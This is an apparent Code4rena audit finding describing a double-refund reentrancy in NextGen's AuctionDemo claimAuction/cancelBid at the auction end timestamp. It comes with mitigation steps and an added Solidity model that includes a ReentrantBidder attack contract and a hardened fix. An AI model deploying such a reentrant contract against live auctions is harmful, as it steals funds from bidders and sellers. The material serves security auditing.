Platform: Code4rena
Start Date: 30/10/2023
Pot Size: $49,250 USDC
Total HM: 14
Participants: 243
Period: 14 days
Judge: 0xsomeone
Id: 302
League: ETH
Rank: 240/243
Findings: 1
Award: $0.00
🌟 Selected for report: 0
🚀 Solo Findings: 0
🌟 Selected for report: smiling_heretic
Also found by: 00decree, 00xSEV, 0x180db, 0x3b, 0x656c68616a, 0xAadi, 0xAleko, 0xAsen, 0xDetermination, 0xJuda, 0xMAKEOUTHILL, 0xMango, 0xMosh, 0xSwahili, 0x_6a70, 0xarno, 0xgrbr, 0xpiken, 0xsagetony, 3th, 8olidity, ABA, AerialRaider, Al-Qa-qa, Arabadzhiev, AvantGard, CaeraDenoir, ChrisTina, DanielArmstrong, DarkTower, DeFiHackLabs, Deft_TT, Delvir0, Draiakoo, Eigenvectors, Fulum, Greed, HChang26, Haipls, Hama, Inference, Jiamin, JohnnyTime, Jorgect, Juntao, Kaysoft, Kose, Kow, Krace, MaNcHaSsS, Madalad, MrPotatoMagic, Neon2835, NoamYakov, Norah, Oxsadeeq, PENGUN, REKCAH, Ruhum, Shubham, Silvermist, Soul22, SovaSlava, SpicyMeatball, Talfao, TermoHash, The_Kakers, Toshii, TuringConsulting, Udsen, VAD37, Vagner, Zac, Zach_166, ZdravkoHr, _eperezok, ak1, aldarion, alexfilippov314, alexxander, amaechieth, aslanbek, ast3ros, audityourcontracts, ayden, bdmcbri, bird-flu, blutorque, bronze_pickaxe, btk, c0pp3rscr3w3r, c3phas, cartlex_, cccz, ciphermarco, circlelooper, crunch, cryptothemex, cu5t0mpeo, darksnow, degensec, dethera, devival, dimulski, droptpackets, epistkr, evmboi32, fibonacci, gumgumzum, immeas, innertia, inzinko, jasonxiale, joesan, ke1caM, kimchi, lanrebayode77, lsaudit, mahyar, max10afternoon, merlin, mrudenko, nuthan2x, oakcobalt, openwide, orion, phoenixV110, pontifex, r0ck3tz, rotcivegaf, rvierdiiev, seeques, shenwilly, sl1, slvDev, t0x1c, tallo, tnquanghuy0512, tpiliposian, trachev, twcctop, vangrim, volodya, xAriextz, xeros, xuwinnie, y4y, yobiz, zhaojie
0 USDC - $0.00
Lines of code:
https://github.com/code-423n4/2023-10-nextgen/blob/8b518196629faa37eae39736837b24926fd3c07c/smart-contracts/AuctionDemo.sol#L104
https://github.com/code-423n4/2023-10-nextgen/blob/8b518196629faa37eae39736837b24926fd3c07c/smart-contracts/AuctionDemo.sol#L124
Vulnerability details:

The claimAuction function of the AuctionDemo contract transfers the token to the highest bidder (the winner) and sends the winning bid amount to the owner. It also refunds every remaining participant (the non-winners) with a low-level call. However, the refund loop does not mark a bid as settled before making that call, so if a non-winner is a contract it can invoke cancelBid from its receive or fallback handler while the refund is being sent. This way the attacker is refunded twice: once by claimAuction and a second time by cancelBid.

Proof of Concept:

claimAuction is called exactly at the auction end time (i.e. block.timestamp == AuctionEndTime). Its time check is inclusive, so the following condition is true:

require(block.timestamp >= minter.getAuctionEndTime(_tokenid)...

The refund to the attacker's contract is sent with call, which hands execution to the attacker. The attacker invokes cancelBid, whose time check is also inclusive and therefore still true at the same timestamp, so the bid is cancelled and paid out again:

function cancelBid(uint256 _tokenid, uint256 index) public {
    require(block.timestamp <= minter.getAuctionEndTime(_tokenid), "Auction ended");
    (bool success, ) = payable(auctionInfoData[_tokenid][index].bidder).call{value: auctionInfoData[_tokenid][index].bid}("");
Same is also
Tools Used: Manual Review

Recommended Mitigation Steps:

Line 115 should set the bid's status to false before sending the refund, so that a reentrant cancelBid fails its status check (checks-effects-interactions):

} else if (auctionInfoData[_tokenid][i].status == true) {

Moreover, remove the equality from the time condition in cancelBid so that its window no longer overlaps with claimAuction at block.timestamp == AuctionEndTime:

require(block.timestamp < minter.getAuctionEndTime(_tokenid), "Auction ended");

or remove the equality from the condition in claimAuction instead:

require(block.timestamp > minter.getAuctionEndTime(_tokenid)...
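The vulnerable flow and the recommended fix side by side, as an added Solidity example that is not part of the original finding or of the NextGen code base. AuctionModel is a cut-down stand-in for AuctionDemo with assumed names (Bid, bids, auctionEndTime, participateToAuction, saleOwner, bidCount, Paid) and without the token transfer or access control; HardenedAuction applies both mitigation steps above; ReentrantBidder is the non-winning contract that re-enters cancelBid from its receive() hook.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Stripped-down model of the refund path discussed above. Added illustration, not
// the NextGen AuctionDemo code: Bid, bids, auctionEndTime, participateToAuction,
// saleOwner and bidCount are assumed names; token transfer and access control are
// omitted so the money flow stays visible.
contract AuctionModel {
    struct Bid { address bidder; uint256 bid; bool status; }
    mapping(uint256 => Bid[]) public bids;
    mapping(uint256 => uint256) public auctionEndTime;
    mapping(uint256 => bool) public auctionClaim;
    address public immutable saleOwner;
    event Paid(address to, uint256 tokenId, bool success, uint256 amount);

    constructor(address _saleOwner) { saleOwner = _saleOwner; }
    function openAuction(uint256 tokenId, uint256 endTime) external { auctionEndTime[tokenId] = endTime; }
    function bidCount(uint256 tokenId) external view returns (uint256) { return bids[tokenId].length; }

    function participateToAuction(uint256 tokenId) external payable {
        require(block.timestamp <= auctionEndTime[tokenId], "Auction ended");
        bids[tokenId].push(Bid(msg.sender, msg.value, true));
    }

    // Inclusive bound, as in the report: at block.timestamp == auctionEndTime this check
    // and the one in claimAuction both pass, which is the window the attack needs.
    function _cancelAllowed(uint256 tokenId) internal view virtual returns (bool) {
        return block.timestamp <= auctionEndTime[tokenId];
    }

    // Refund without clearing status: the bid is still live while the bidder's
    // receive() runs, so a reentrant cancelBid pays it out a second time.
    function _refund(uint256 tokenId, Bid storage b) internal virtual {
        (bool success, ) = payable(b.bidder).call{value: b.bid}("");
        emit Paid(b.bidder, tokenId, success, b.bid);
    }

    function cancelBid(uint256 tokenId, uint256 index) external {
        require(_cancelAllowed(tokenId), "Auction ended");
        Bid storage b = bids[tokenId][index];
        require(b.bidder == msg.sender && b.status, "not a live bid of caller");
        b.status = false;
        (bool success, ) = payable(b.bidder).call{value: b.bid}("");
        emit Paid(b.bidder, tokenId, success, b.bid);
    }

    function claimAuction(uint256 tokenId) external {
        require(block.timestamp >= auctionEndTime[tokenId] && !auctionClaim[tokenId], "not claimable");
        auctionClaim[tokenId] = true;
        Bid[] storage all = bids[tokenId];
        uint256 hi = _highestIndex(all);
        for (uint256 i = 0; i < all.length; i++) {
            if (!all[i].status) continue;
            if (i == hi) {
                // Token transfer omitted; as in the original, a failed payout is only logged.
                (bool success, ) = payable(saleOwner).call{value: all[i].bid}("");
                emit Paid(saleOwner, tokenId, success, all[i].bid);
            } else {
                _refund(tokenId, all[i]);
            }
        }
    }

    function _highestIndex(Bid[] storage all) internal view returns (uint256 hi) {
        uint256 best;
        for (uint256 i = 0; i < all.length; i++) {
            if (all[i].status && all[i].bid > best) { best = all[i].bid; hi = i; }
        }
    }
}

// The report's mitigation: clear status before the external call (checks-effects-
// interactions) and make the cancelBid window strict so the two time checks no longer
// overlap. Either change alone blocks the double refund; both together are safest.
contract HardenedAuction is AuctionModel {
    constructor(address _saleOwner) AuctionModel(_saleOwner) {}
    function _cancelAllowed(uint256 tokenId) internal view override returns (bool) {
        return block.timestamp < auctionEndTime[tokenId];
    }
    function _refund(uint256 tokenId, Bid storage b) internal override {
        b.status = false; // effect first: a reentrant cancelBid now fails its status check
        (bool success, ) = payable(b.bidder).call{value: b.bid}("");
        emit Paid(b.bidder, tokenId, success, b.bid);
    }
}

// Non-winning bidder that re-enters cancelBid from receive() while its refund arrives.
contract ReentrantBidder {
    AuctionModel public immutable target;
    uint256 public immutable tokenId;
    uint256 public index;
    bool private reentered;
    constructor(AuctionModel _target, uint256 _tokenId) { target = _target; tokenId = _tokenId; }

    function bid() external payable {
        index = target.bidCount(tokenId);
        target.participateToAuction{value: msg.value}(tokenId);
    }

    receive() external payable {
        if (reentered) return;
        reentered = true;
        // Against AuctionModel at block.timestamp == auctionEndTime this succeeds and the bid
        // is paid twice; against HardenedAuction it reverts and the catch swallows it.
        try target.cancelBid(tokenId, index) {} catch {}
    }
}
```

Walk-through with this model: the ReentrantBidder bids first (index 0), an honest bidder then outbids it, and claimAuction is called in a block whose timestamp equals auctionEndTime. The loop refunds index 0, receive() calls cancelBid, which passes both its checks and pays the same bid a second time; when the loop reaches the winner the balance is short, the saleOwner payout's call returns false, and the contract only logs it. With HardenedAuction the inner cancelBid reverts at the strict time check, and would still revert at the status check if only the status fix were applied. Note that the exploitable window is a single timestamp value (block.timestamp == auctionEndTime), so the attack depends on when claimAuction lands; clearing status before the call removes that timing dependency entirely.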
Reentrancy
#0 - c4-pre-sort
2023-11-15T00:18:41Z
141345 marked the issue as duplicate of #962
#1 - c4-judge
2023-12-04T21:43:02Z
alex-ppg marked the issue as duplicate of #1323
#2 - c4-judge
2023-12-08T17:32:11Z
alex-ppg marked the issue as partial-50
#3 - c4-judge
2023-12-08T17:33:31Z
alex-ppg marked the issue as full credit
#4 - c4-judge
2023-12-08T17:34:33Z
alex-ppg marked the issue as partial-50